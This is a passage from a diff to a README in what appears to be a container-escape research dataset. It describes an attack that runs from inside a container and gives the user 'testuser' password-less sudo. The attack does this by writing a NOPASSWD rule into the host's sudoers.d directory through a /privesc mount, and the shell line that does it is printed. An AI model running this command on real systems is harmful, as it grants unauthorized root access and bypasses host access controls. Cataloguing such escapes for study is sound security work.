jpope8/container-escape-dataset/containers/README.md

 ### Attack

-The attack assumes a user testuer aleady exists that has password requires sudo privilege (the attack changes this to password-less).
+The attack assumes the user *testuser* aleady exists.
+The *testuser* should be in the sudo'ers list but requires a password (the attack changes this to password-less).
 From within the container, the following is executed.

 ```bash
 echo "testuser ALL=(ALL) NOPASSWD: ALL" > /privesc/etc/sudoers.d/010_testuser-nopasswd